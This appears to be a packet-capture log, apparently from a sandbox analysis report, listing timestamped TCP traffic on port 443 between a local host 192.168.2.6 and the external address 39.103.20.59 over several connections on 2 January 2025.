Jan 2, 2025 12:14:07.259212971 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.259270906 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.259532928 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.259588003 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.260092974 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.260129929 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.260153055 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.260159016 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.260169029 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.260196924 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.260900021 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.260957956 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.260981083 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.261024952 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.261081934 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.261130095 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.261887074 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.261934996 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.261946917 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.261950970 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.261981010 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.261998892 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.262840033 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.262867928 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.262895107 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.262900114 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.262918949 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.262940884 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.508554935 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.508611917 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.508708000 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.508748055 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.508748055 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.508768082 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.508799076 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.508810043 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.508827925 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.508858919 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.508869886 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.508873940 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.508912086 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.509089947 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.509144068 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.509146929 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.509156942 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.509195089 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.509205103 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.509320974 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.509351015 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.509366989 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.509371042 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.509399891 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.509407043 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.509409904 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.509449959 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.509450912 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.509500027 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.511610031 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.511636019 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.546425104 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.546466112 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.546552896 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.546727896 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.546744108 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:08.799942017 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:08.800029039 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:08.800401926 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:08.800409079 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:08.800559998 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:08.800564051 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.133304119 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.133336067 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.133392096 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.133408070 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.133421898 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.133491993 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.133877993 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.133946896 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.134111881 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.134176970 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.378770113 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.378916979 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.379334927 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.379405022 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.379710913 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.379770041 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.380335093 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.380367994 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.380399942 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.380409956 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.380436897 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.380454063 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.381227970 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.381288052 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.381400108 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.381453991 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.607768059 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.607839108 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.608048916 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.608103991 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.608462095 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.608493090 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.608508110 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.608513117 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.608547926 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.608570099 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.608952045 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.608992100 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.609065056 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.609071016 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.609112978 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.609808922 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.609860897 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.609877110 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.609924078 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.610034943 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.610080957 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.610734940 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.610785961 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.610833883 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.610878944 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.610996008 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.611037016 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.611746073 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.611795902 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.611854076 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.611896992 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.837007999 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837054968 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837093115 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837248087 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.837248087 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.837274075 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837291002 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837346077 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.837353945 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837399960 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.837440014 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837469101 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837492943 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.837498903 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837527990 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.837537050 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.837553024 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.837590933 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.839426041 CET	49974	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.839448929 CET	443	49974	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.883006096 CET	49983	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.883050919 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:09.883152962 CET	49983	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.883464098 CET	49983	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:09.883475065 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.211224079 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.211332083 CET	49983	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:11.211906910 CET	49983	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:11.211930037 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.212131977 CET	49983	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:11.212137938 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.691905975 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.691937923 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.691981077 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.692022085 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.692109108 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.692230940 CET	49983	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:11.692230940 CET	49983	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:11.693342924 CET	49983	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:11.693362951 CET	443	49983	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.707532883 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:11.707583904 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:11.707667112 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:11.707909107 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:11.707917929 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:12.907279015 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:12.907551050 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:12.908375025 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:12.908384085 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:12.908720016 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:12.908725023 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.218048096 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.218071938 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.218153954 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.218178988 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.218285084 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.218328953 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.218333960 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.218373060 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.219785929 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.219840050 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.223475933 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.223541975 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.304600954 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.304701090 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.304717064 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.304884911 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.305064917 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.305114031 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.305571079 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.305619955 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.306401968 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.306449890 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.306940079 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.306987047 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.308320999 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.308367968 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.308571100 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.308614016 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.310259104 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.310312986 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.391295910 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.391365051 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.391417027 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.391422987 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.391433001 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.391459942 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.391521931 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.391805887 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.391849041 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.392155886 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.392210960 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.392254114 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.392292976 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.392627954 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.392669916 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.392810106 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.392849922 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.392913103 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.392949104 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.392973900 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.393013954 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.393609047 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.393774986 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.393779993 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.393826962 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.394076109 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.394133091 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.395438910 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.395499945 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.396868944 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.396930933 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.396982908 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.397025108 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.478185892 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478235960 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478271961 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.478291988 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478306055 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.478307009 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478349924 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.478354931 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478389978 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.478406906 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478456974 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.478548050 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478591919 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.478658915 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478708029 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.478806973 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478862047 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.478903055 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.478952885 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.479074955 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.479120970 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.479146957 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.479192972 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.479346037 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.479393959 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.479465008 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.479516983 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.479634047 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.479661942 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.479680061 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.479685068 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.479700089 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.479717970 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.479846001 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.479892015 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.483227968 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.483273029 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.483294010 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.483303070 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.483329058 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.483331919 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.483338118 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.483342886 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.483366966 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.483375072 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.483395100 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.483398914 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.483418941 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.483437061 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.483474016 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.483525038 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.485037088 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.485091925 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.486886978 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.486943007 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.488754988 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.488814116 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.492666006 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.492719889 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.494353056 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.494406939 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.498064995 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.498131037 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.499958992 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.500025988 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.503575087 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.503645897 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.505470991 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.505528927 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565099955 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565172911 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565202951 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565247059 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565263987 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565274000 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565284967 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565287113 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565316916 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565321922 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565344095 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565366030 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565367937 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565376043 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565421104 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565468073 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565511942 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565548897 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565567017 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565571070 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565597057 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565608978 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565632105 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565634966 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565658092 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565680027 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565721989 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565773964 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:13.565867901 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:13.565917015 CET	49984	443	192.168.2.6	39.103.20.59
